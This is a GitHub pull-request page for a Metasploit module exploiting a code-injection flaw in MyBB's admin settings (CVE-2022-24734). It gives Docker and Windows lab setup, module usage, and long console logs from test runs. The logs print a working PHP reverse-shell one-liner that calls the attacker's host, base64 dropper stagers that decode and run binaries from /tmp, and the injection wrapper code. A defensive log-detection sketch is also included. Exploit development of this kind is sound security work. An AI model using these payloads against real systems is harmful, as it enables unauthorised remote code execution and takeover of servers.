
MyBB Admin Control Code Injection RCE (CVE-2022-24734) #16607

Merged

Conversation

cdelafuente-r7 (Contributor)

This exploit module leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application.

The MyBB Admin Control settings page calls the PHP eval function on unsanitized user input. The exploit adds a new setting, injecting the payload into the vulnerable field, and triggers its execution with a second request. Finally, it takes care of cleaning up and removes the setting.

Note that authentication is required for this exploit to work, and the account must have rights to add or update settings (typically, the MyBB administrator role).

Installation Steps

Linux with Docker

  • Use this docker-compose.yml file (see this):
services:
  mybb:
    image: mybb/mybb:1.8.29
    volumes:
    - ${PWD}/mybb:/var/www/html:rw

  nginx:
    image: nginx:mainline-alpine
    ports:
    - published: 8080
      target: 80
    volumes:
    - ${PWD}/nginx:/etc/nginx/conf.d:ro
    - ${PWD}/mybb:/var/www/html:ro

  postgresql:
    environment:
      POSTGRES_DB: mybb
      POSTGRES_PASSWORD: changeme
      POSTGRES_USER: mybb
    image: postgres:14-alpine
    volumes:
    - ${PWD}/postgres/data:/var/lib/postgresql/data:rw

version: '3.8'
  • Create nginx/default.conf
    upstream mybb {
        server mybb:9000 weight=5;
    }
    
    server {
        listen 80;
    
        root /var/www/html;
        index index.html index.php;
    
        location / {
            try_files $uri $uri/ /index.php?$args;
        }
    
        location ~ inc/ {
            internal;
        }
    
        location ~ ^/(images|cache|jscripts|uploads)/ {
            access_log off;
        }
    
        location ~ \.php$ {
            try_files $uri =404;
            fastcgi_split_path_info ^(.+\.php)(/.+)$;
            fastcgi_pass mybb;
            fastcgi_index index.php;
            include fastcgi_params;
            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
            fastcgi_param PATH_INFO $fastcgi_path_info;
        }
    }
    
  • Run docker-compose up.
  • Access the application at http://127.0.0.1:8080/install and finish the installation process.

Windows with Nginx, PHP and MySQL

  • Install MySQL:
    • Follow the installation process here
  • Install PHP:
    • Download PHP (Non Thread Safe) here
    • Extract everything to C:\php
    • Run:
      cd C:\php
      set PHP_FCGI_CHILDREN=5
      set PHP_FCGI_MAX_REQUESTS=500
      php-cgi.exe -b 127.0.0.1:9999
      
  • Install Nginx:
    • Download Nginx here
    • Extract everything to C:\nginx
    • Set the following options in C:\nginx\nginx.conf
      worker_processes  auto;
      ...
      server {
          listen 80;
      
          root www;
          index index.html index.php;
      
          location / {
              try_files $uri $uri/ /index.php?$args;
          }
      
          location ~ inc/ {
              internal;
          }
      
          location ~ ^/(images|cache|jscripts|uploads)/ {
              access_log off;
          }
      
          location ~ \.php$ {
              try_files $uri =404;
              fastcgi_split_path_info ^(.+\.php)(/.+)$;
              fastcgi_pass 127.0.0.1:9999;
              fastcgi_index index.php;
              include fastcgi_params;
              fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
              fastcgi_param PATH_INFO $fastcgi_path_info;
          }
      }
      
    • Run:
      cd C:\nginx
      start nginx.exe
      
  • Install MyBB
    • Follow the installation process here.

Verification Steps

  1. Install the application (see Installation Steps)
  2. Start msfconsole
  3. Do: use exploit/multi/http/mybb_rce_cve_2022_24734
  4. Do: run LHOST=<local host IP> RHOSTS=<remote host IP> USERNAME=<MyBB user> PASSWORD=<MyBB password>
  5. You should get a shell.
  6. Try again with different targets

Options

USERNAME

The username of a privileged MyBB account. It must have rights to add or update settings (usually the administrator role).

PASSWORD

The password of the MyBB account.

Scenarios

Windows (target 0 - PHP)

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 192.168.1.215
[*] Meterpreter session 1 opened (192.168.1.44:4444 -> 192.168.1.215:63777) at 2022-05-23 15:41:40 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...

meterpreter > sysinfo
Computer    : DC02
OS          : Windows NT DC02 10.0 build 17763 (Windows Server 2019) AMD64
Meterpreter : php/windows

Linux (target 0 - PHP)

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 192.168.0.48
[*] Meterpreter session 2 opened (192.168.0.48:4444 -> 192.168.0.48:50029) at 2022-05-23 15:41:58 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...

meterpreter > sysinfo
Computer    : e087259940a8
OS          : Linux e087259940a8 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
Meterpreter : php/linux

Linux (target 1 - Unix (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 1
target => 1
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[+] php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.0.48:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
[*] Started reverse SSL handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command shell session 3 opened (192.168.0.48:4444 -> 192.168.0.48:50151) at 2022-05-23 15:42:58 +0200


ls
backups
inc
index.php
jscripts
modules
styles
^C
Abort session 3? [y/N]  y

Linux (target 2 - linux (Dropper))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgBE2gCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/UAznK.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/jHFeb' < '/tmp/UAznK.b64' ; chmod +x '/tmp/jHFeb' ; '/tmp/jHFeb' ; rm -f '/tmp/jHFeb' ; rm -f '/tmp/UAznK.b64'"]
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 192.168.0.48
[*] Meterpreter session 4 opened (192.168.0.48:4444 -> 192.168.0.48:50213) at 2022-05-23 15:43:26 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : 172.18.0.4
OS           :  (Linux 5.10.76-linuxkit)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Windows (target 3 - PowerShell (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 3
target => 3
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Powershell command length: 6767
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (175174 bytes) to 192.168.1.215
[*] Meterpreter session 5 opened (192.168.1.44:4444 -> 192.168.1.215:63818) at 2022-05-23 15:43:54 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...

meterpreter > sysinfo
Computer        : DC02
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 8
Meterpreter     : x86/windows

Windows (target 4 - Windows (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 4
target => 4
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command shell session 6 opened (192.168.1.44:4444 -> 192.168.1.215:63848) at 2022-05-23 15:44:23 +0200


Shell Banner:
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\nginx\www\admin>
-----


C:\nginx\www\admin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 4215-6DA6

 Directory of C:\nginx\www\admin

05/19/2022  04:11 PM    <DIR>          .
05/19/2022  04:11 PM    <DIR>          ..
05/19/2022  04:11 PM    <DIR>          backups
05/19/2022  04:11 PM    <DIR>          inc
10/29/2021  12:00 AM            24,476 index.php
05/19/2022  04:11 PM    <DIR>          jscripts
05/19/2022  04:11 PM    <DIR>          modules
05/19/2022  04:11 PM    <DIR>          styles
               1 File(s)         24,476 bytes
               7 Dir(s)  48,613,580,800 bytes free

Windows (target 5 - Windows (Dropper))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 5
target => 5
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress -   2.01% done (2046/101881 bytes)
...
[*] Command Stager progress -  98.40% done (100252/101881 bytes)
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (175174 bytes) to 192.168.1.215
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Meterpreter session 7 opened (192.168.1.44:4444 -> 192.168.1.215:64264) at 2022-05-23 15:45:07 +0200

meterpreter > sysinfo
Computer        : DC02
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 8
Meterpreter     : x86/windows
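
A defender-side complement to the flow described above and visible in the Verbose output (add a setting, request the page that evaluates it, delete the setting again): this added Python example is not part of the Metasploit module or of MyBB, and scans nginx access-log lines (combined format, as the default.conf from the install steps produces) for that sequence from one client inside a short window. The ACP query parameters it keys on (module=config-settings with action=add, action=change and action=delete) and the sample log lines are assumptions constructed for the example.

```python
"""Detection sketch, added here as an example (not code from the Metasploit
module or from MyBB): find the add -> trigger -> delete request run that the
module's Verbose output shows.  The ACP routes matched below are assumed."""
import re
from datetime import datetime, timedelta

# nginx "combined" format: ip - user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: 172.18.0.1 adds a setting, loads the page that evaluates
# it and deletes it within seconds (the exploit's pattern); 10.0.0.7 adds a
# setting and removes it an hour later (ordinary admin work).
SAMPLE_LOG = """\
172.18.0.1 - - [23/May/2022:15:41:30 +0200] "POST /admin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
172.18.0.1 - - [23/May/2022:15:41:36 +0200] "POST /admin/index.php?module=config-settings&action=add HTTP/1.1" 302 0 "-" "Mozilla/5.0"
172.18.0.1 - - [23/May/2022:15:41:39 +0200] "GET /admin/index.php?module=config-settings&action=change&gid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
172.18.0.1 - - [23/May/2022:15:41:41 +0200] "GET /admin/index.php?module=config-settings&action=delete&sid=42 HTTP/1.1" 200 980 "-" "Mozilla/5.0"
172.18.0.1 - - [23/May/2022:15:41:42 +0200] "POST /admin/index.php?module=config-settings&action=delete HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.7 - - [23/May/2022:16:02:10 +0200] "POST /admin/index.php?module=config-settings&action=add HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.7 - - [23/May/2022:16:02:15 +0200] "GET /admin/index.php?module=config-settings&action=change&gid=2 HTTP/1.1" 200 6001 "-" "Mozilla/5.0"
10.0.0.7 - - [23/May/2022:17:30:00 +0200] "GET /admin/index.php?module=config-settings&action=delete&sid=43 HTTP/1.1" 200 980 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line; None when the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"], "status": int(m["status"])}


def classify(req):
    """Map a request to an exploit step.  module=config-settings with
    action=add / change / delete is assumed to be how MyBB's ACP routes the
    settings manager; it is not stated on this page."""
    path = req["path"]
    if "module=config-settings" not in path:
        return None
    if req["method"] == "POST" and "action=add" in path:
        return "add"
    if "action=change" in path:
        return "trigger"       # the settings page that evaluates the entry
    if "action=delete" in path:
        return "delete"
    return None


def find_suspicious_sequences(lines, window=timedelta(seconds=120)):
    """Return (ip, add_time, delete_time, triggered) for each client that adds
    a setting and deletes it again inside `window`; `triggered` records whether
    the evaluating page was requested in between, which the payload needs."""
    state, hits = {}, []
    for line in lines:
        req = parse_line(line)
        if req is None or req["status"] >= 400:
            continue            # unparsable, or the server rejected it
        step = classify(req)
        if step is None:
            continue
        s = state.setdefault(req["ip"], {})
        if step == "add":
            s.clear()
            s.update(add=req["ts"], triggered=False)
        elif step == "trigger" and "add" in s:
            s["triggered"] = True
        elif step == "delete" and "add" in s:
            if req["ts"] - s["add"] <= window:
                hits.append((req["ip"], s["add"], req["ts"], s["triggered"]))
            s.clear()           # the confirm POST of the same delete is ignored
    return hits


def scan(log_text=SAMPLE_LOG):
    return find_suspicious_sequences(log_text.splitlines())
```

Access logs carry no request bodies, so this keys on the request sequence alone; the MyBB Admin CP's own administrator log is the place to confirm what the setting contained.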

@jheysel-r7 jheysel-r7 self-assigned this May 24, 2022
Review comment on lines 216 to 232 of modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb:

    case target['Platform']
    when 'php'
      cmd = cmd.gsub(/"/, '"' => '\\"')
      cmd = cmd.gsub(/\$/, '$' => '\\$')
      extra = "\" . eval(\"#{cmd}\") .\""
    when 'win'
      cmd = cmd.gsub(/'/, "'" => "\\'")
      if target['Arch'] == ARCH_CMD
        # Force cmd to run in the background (only works for `cmd`)
        extra = "\" . pclose(popen('start /B #{cmd}', 'r')) .\""
      else
        extra = "\" . system('#{cmd}') .\""
      end
    else
      cmd = cmd.gsub(/'/, "'" => "\\'")
      extra = "\" . system('#{cmd} > /dev/null &') .\""
    end
Contributor

This feels like a PHP utility function for staging commands via PHP.

Contributor

Especially because you might want to add alternatives if system and popen are blocked :)

Contributor Author

Yes, I agree, it is certainly a good start for such a helper. However, it is very specific to how the PHP code is being injected. Here, the injection occurs in an eval(), as a simple concatenation to a string.

cdelafuente-r7 (Contributor Author)

Thanks for the review @smcintyre-r7, @jmartin-r7, @jvoisin and @jheysel-r7. I pushed some updates to address your feedback.

@jvoisin, in relation to this comment: it would be interesting to provide alternatives to system() and popen() in a more generic way. Any suggestions in the context of this exploit? Maybe moving this logic to an external mixin with a helper function that provides generic PHP command injection (as @jmartin-r7 suggested). This could be backed up by a specific datastore option that lets the user choose which API should be used?

jvoisin (Contributor) commented May 30, 2022

Moving it to a mixin would make sense, since this is kinda off-topic in this module I think.

jheysel-r7 (Contributor)

Thanks @cdelafuente-r7 for the great module! Code looks great and testing provided the expected output on both Linux and Windows installs:

Linux (target 0 - PHP)

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.20.0.1 RHOSTS=172.16.199.158 RPORT=8080 USERNAME=admin PASSWORD=admin

[*] Started reverse TCP handler on 172.20.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 172.20.0.3
[*] Meterpreter session 1 opened (172.20.0.1:4444 -> 172.20.0.3:58624) at 2022-05-26 08:31:08 -0700
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...

meterpreter > sysinfo
Computer    : 5722bad13440
OS          : Linux 5722bad13440 5.13.0-44-generic #49~20.04.1-Ubuntu SMP Wed May 18 18:44:28 UTC 2022 x86_64
Meterpreter : php/linux
meterpreter >

Linux (target 1 - Unix (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.20.0.1 RHOSTS=172.16.199.158 RPORT=8080 USERNAME=admin PASSWORD=admin

[+] php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://172.20.0.1:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
[*] Started reverse SSL handler on 172.20.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command shell session 2 opened (172.20.0.1:4444 -> 172.20.0.3:58626) at 2022-05-26 08:40:19 -0700


id
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)

Linux (target 2 - linux (Dropper))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.20.0.1 RHOSTS=172.16.199.158 RPORT=8080 USERNAME=admin PASSWORD=admin

[*] Started reverse TCP handler on 172.20.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1torBQAAWgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/jxCKF.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/sSzgJ' < '/tmp/jxCKF.b64' ; chmod +x '/tmp/sSzgJ' ; '/tmp/sSzgJ' ; rm -f '/tmp/sSzgJ' ; rm -f '/tmp/jxCKF.b64'"]
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 172.20.0.3
[*] Meterpreter session 4 opened (172.20.0.1:4444 -> 172.20.0.3:58634) at 2022-05-26 08:43:24 -0700
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : 172.20.0.3
OS           :  (Linux 5.13.0-44-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Windows (target 0 - PHP)

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.16.199.1 RHOSTS=172.16.199.236 USERNAME=admin PASSWORD=admin

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 172.16.199.236
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.236:49917) at 2022-05-27 14:20:49 -0400
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...

meterpreter > sysinfo
Computer    : DESKTOP-0LJOKTA
OS          : Windows NT DESKTOP-0LJOKTA 10.0 build 19042 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > exit -y

Windows (target 3 - PowerShell (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.16.199.1 RHOSTS=172.16.199.236 USERNAME=admin PASSWORD=admin

[*] Powershell command length: 4227
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Sending stage (175174 bytes) to 172.16.199.236
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.236:50291) at 2022-05-31 11:50:07 -0400

meterpreter > sysinfo
Computer        : DESKTOP-0LJOKTA
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Windows (target 4 - Windows (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.16.199.1 RHOSTS=172.16.199.236 USERNAME=admin PASSWORD=admin

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0>>%TEMP%\\TsbHi.vbs & echo For n = 1 

...

[*] Command Stager progress -  98.40% done (100252/101881 bytes)
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (175174 bytes) to 172.16.199.236
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.236:50257) at 2022-05-31 11:46:20 -0400

meterpreter > sysinfo
Computer        : DESKTOP-0LJOKTA
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

@jheysel-r7 jheysel-r7 merged commit bea4207 into rapid7:master May 31, 2022
@cdelafuente-r7 cdelafuente-r7 deleted the mybb_forum_rce_CVE-2022-24734 branch June 1, 2022 08:13
@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 1, 2022
cdelafuente-r7 (Contributor Author)

Release Notes

Adds an exploit module that leverages an improper input validation vulnerability in MyBB prior to 1.8.30 (CVE-2022-24734) to execute arbitrary code in the context of the user running the application. Authentication to the MyBB Admin Control is required for this exploit to work and the account must have rights to add or update settings.
